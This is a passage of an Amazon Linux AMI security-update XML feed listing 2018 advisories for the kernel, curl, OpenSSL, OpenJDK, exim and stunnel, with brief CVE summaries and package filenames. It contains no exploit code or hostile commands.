</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6247" title="" id="CVE-2018-6247" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6248" title="" id="CVE-2018-6248" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6249" title="" id="CVE-2018-6249" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6250" title="" id="CVE-2018-6250" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6251" title="" id="CVE-2018-6251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6252" title="" id="CVE-2018-6252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6253" title="" id="CVE-2018-6253" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nvidia-dkms" version="384.125" release="2017.09.109.amzn1" epoch="2" arch="x86_64"><filename>Packages/nvidia-dkms-384.125-2017.09.109.amzn1.x86_64.rpm</filename></package><package name="nvidia" version="384.125" release="2017.09.109.amzn1" epoch="2" arch="x86_64"><filename>Packages/nvidia-384.125-2017.09.109.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-993</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-993: medium priority package update for kernel</title><issued date="2018-04-19 04:44:00" /><updated date="2018-05-10 23:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5803:
An error in the &quot;_sctp_make_chunk()&quot; function (net/sctp/sm_make_chunk.c) when handling the SCTP packet length can be exploited by a malicious local user to cause a kernel crash and a DoS.
1551051:
CVE-2018-5803 kernel: Missing length check of payload in net/sctp/sm_make_chunk.c:_sctp_make_chunk() function allows denial of service
CVE-2018-1066:
A flaw was found in the Linux kernel&#039;s client-side implementation of the CIFS protocol. This flaw allows an attacker controlling the server to cause a kernel panic on a client that has the CIFS server mounted.
1539599:
CVE-2018-1066 kernel: Null pointer dereference in fs/cifs/cifsencrypt.c:setup_ntlmv2_rsp() when empty TargetInfo is returned in NTLMSSP setup negotiation response allowing to crash client's kernel
CVE-2017-18232:
The Serial Attached SCSI (SAS) implementation in the Linux kernel mishandles a mutex within libsas. This allows local users to cause a denial of service (deadlock) by triggering certain error-handling code.
1558066:
CVE-2017-18232 kernel: Mishandling mutex within libsas allowing local Denial of Service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18232" title="" id="CVE-2017-18232" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1066" title="" id="CVE-2018-1066" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5803" title="" id="CVE-2018-5803" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="4.9.93" release="41.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.93" release="41.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.93" release="41.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.93" release="41.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.93" release="41.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.93" release="41.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.93" release="41.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.93" release="41.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.93" release="41.60.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.93" release="41.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.93" release="41.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.93" release="41.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.93" release="41.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.93" release="41.60.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.93" release="41.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.93" release="41.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.93" release="41.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.93" release="41.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.93" release="41.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.93" release="41.60.amzn1" epoch="0" 
arch="i686"><filename>Packages/perf-debuginfo-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.93" release="41.60.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.93-41.60.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-995</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-995: medium priority package update for curl</title><issued date="2018-04-19 04:56:00" /><updated date="2018-04-19 22:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1000122:
A buffer over-read exists in curl 7.20.0 up to and including curl 7.58.0 in the RTSP+RTP handling code that allows an attacker to cause a denial of service or information leakage.
1553398:
CVE-2018-1000122 curl: RTSP RTP buffer over-read
CVE-2018-1000121:
A NULL pointer dereference flaw was found in the way libcurl checks values returned by the openldap ldap_get_attribute_ber() function. A malicious LDAP server could use this flaw to crash a libcurl client application via a specially crafted LDAP reply.
1552631:
CVE-2018-1000121 curl: LDAP NULL pointer dereference
CVE-2018-1000120:
It was found that libcurl did not safely parse FTP URLs when using the CURLOPT_FTP_FILEMETHOD method. An attacker able to provide a specially crafted FTP URL to an application using libcurl could write a NULL byte at an arbitrary location, resulting in a crash or unspecified behavior.
1552628:
CVE-2018-1000120 curl: FTP path trickery leads to NIL byte out of bounds write
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000120" title="" id="CVE-2018-1000120" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000121" title="" id="CVE-2018-1000121" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000122" title="" id="CVE-2018-1000122" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl-devel" version="7.53.1" release="16.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.53.1-16.84.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="16.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.53.1-16.84.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.53.1" release="16.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.53.1-16.84.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.53.1" release="16.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.53.1-16.84.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="16.84.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.53.1-16.84.amzn1.i686.rpm</filename></package><package name="curl" version="7.53.1" release="16.84.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.53.1-16.84.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.53.1" release="16.84.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.53.1-16.84.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="16.84.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.53.1-16.84.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2018-996</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-996: medium priority package update for stunnel amazon-efs-utils</title><issued date="2018-04-19 04:59:00" /><updated date="2018-04-20 00:18:00" /><severity>medium</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="amazon-efs-utils" version="1.2" release="1.amzn1" epoch="0" arch="noarch"><filename>Packages/amazon-efs-utils-1.2-1.amzn1.noarch.rpm</filename></package><package name="stunnel-debuginfo" version="4.56" release="4.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/stunnel-debuginfo-4.56-4.13.amzn1.x86_64.rpm</filename></package><package name="stunnel" version="4.56" release="4.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/stunnel-4.56-4.13.amzn1.x86_64.rpm</filename></package><package name="stunnel" version="4.56" release="4.13.amzn1" epoch="0" arch="i686"><filename>Packages/stunnel-4.56-4.13.amzn1.i686.rpm</filename></package><package name="stunnel-debuginfo" version="4.56" release="4.13.amzn1" epoch="0" arch="i686"><filename>Packages/stunnel-debuginfo-4.56-4.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-997</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-997: medium priority package update for exim</title><issued date="2018-04-19 05:07:00" /><updated date="2018-04-19 22:37:00" /><severity>medium</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-mysql" version="4.90.1" release="3.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.90.1-3.15.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.90.1" release="3.15.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/exim-4.90.1-3.15.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.90.1" release="3.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.90.1-3.15.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.90.1" release="3.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.90.1-3.15.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.90.1" release="3.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.90.1-3.15.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.90.1" release="3.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.90.1-3.15.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.90.1" release="3.15.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.90.1-3.15.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.90.1" release="3.15.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.90.1-3.15.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.90.1" release="3.15.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.90.1-3.15.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.90.1" release="3.15.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.90.1-3.15.amzn1.i686.rpm</filename></package><package name="exim" version="4.90.1" release="3.15.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.90.1-3.15.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.90.1" release="3.15.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.90.1-3.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1000</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1000: low priority package 
update for openssl</title><issued date="2018-04-19 17:38:00" /><updated date="2018-04-19 23:00:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-0737:
OpenSSL RSA key generation was found to be vulnerable to cache side-channel attacks. An attacker with sufficient access to mount cache timing attacks during the RSA key generation process could recover parts of the private key.
1568253:
CVE-2018-0737 openssl: RSA key generation cache timing vulnerability in crypto/rsa/rsa_gen.c allows attackers to recover private keys
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0737" title="" id="CVE-2018-0737" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-debuginfo" version="1.0.2k" release="8.107.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-8.107.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="8.107.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-8.107.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="8.107.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-8.107.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="8.107.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-8.107.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="8.107.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-8.107.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="8.107.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-8.107.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="8.107.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-8.107.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="8.107.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-8.107.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="8.107.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-8.107.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="8.107.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-perl-1.0.2k-8.107.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1002</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1002: critical priority package update for java-1.8.0-openjdk</title><issued date="2018-04-26 16:44:00" /><updated date="2018-04-26 22:11:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2815:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567537:
CVE-2018-2815 OpenJDK: unbounded memory allocation during deserialization in StubIORImpl (Serialization, 8192757)
CVE-2018-2814:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1567121:
CVE-2018-2814 OpenJDK: incorrect handling of Reference clones can lead to sandbox bypass (Hotspot, 8192025)
CVE-2018-2800:
Vulnerability in the Java SE, JRockit component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 6u181, 7u171 and 8u162; JRockit: R28.3.17. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, JRockit. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, JRockit accessible data as well as unauthorized read access to a subset of Java SE, JRockit accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.0 Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N).
1568163:
CVE-2018-2800 OpenJDK: RMI HTTP transport enabled by default (RMI, 8193833)
CVE-2018-2799:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JAXP). Supported versions that are affected are Java SE: 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567542:
CVE-2018-2799 OpenJDK: unbounded memory allocation during deserialization in NamedNodeMapImpl (JAXP, 8189993)
CVE-2018-2798:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: AWT). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567543:
CVE-2018-2798 OpenJDK: unbounded memory allocation during deserialization in Container (AWT, 8189989)
CVE-2018-2797:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JMX). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567545:
CVE-2018-2797 OpenJDK: unbounded memory allocation during deserialization in TabularDataSupport (JMX, 8189985)
CVE-2018-2796:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Concurrency). Supported versions that are affected are Java SE: 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567546:
CVE-2018-2796 OpenJDK: unbounded memory allocation during deserialization in PriorityBlockingQueue (Concurrency, 8189981)
CVE-2018-2795:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567351:
CVE-2018-2795 OpenJDK: insufficient consistency checks in deserialization of multiple classes (Security, 8189977)
CVE-2018-2794:
Vulnerability in the Java SE, JRockit component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162, 10 and JRockit: R28.3.17. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Java SE, JRockit executes to compromise Java SE, JRockit. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, JRockit, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 7.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1567126:
CVE-2018-2794 OpenJDK: unrestricted deserialization of data from JCEKS key stores (Security, 8189997)
CVE-2018-2790:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).
1568515:
CVE-2018-2790 OpenJDK: incorrect merging of sections in the JAR manifest (Security, 8189969)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2790" title="" id="CVE-2018-2790" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2794" title="" id="CVE-2018-2794" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2795" title="" id="CVE-2018-2795" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2796" title="" id="CVE-2018-2796" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2797" title="" id="CVE-2018-2797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2798" title="" id="CVE-2018-2798" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2799" title="" id="CVE-2018-2799" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2800" title="" id="CVE-2018-2800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2814" title="" id="CVE-2018-2814" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2815" title="" id="CVE-2018-2815" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-devel" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.171-7.b10.37.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.171-7.b10.37.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.171-7.b10.37.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.171" 
release="7.b10.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.171-7.b10.37.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.171-7.b10.37.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.171-7.b10.37.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.171-7.b10.37.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.171-7.b10.37.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.171-7.b10.37.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.171-7.b10.37.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.171-7.b10.37.amzn1.i686.rpm</filename></package><package 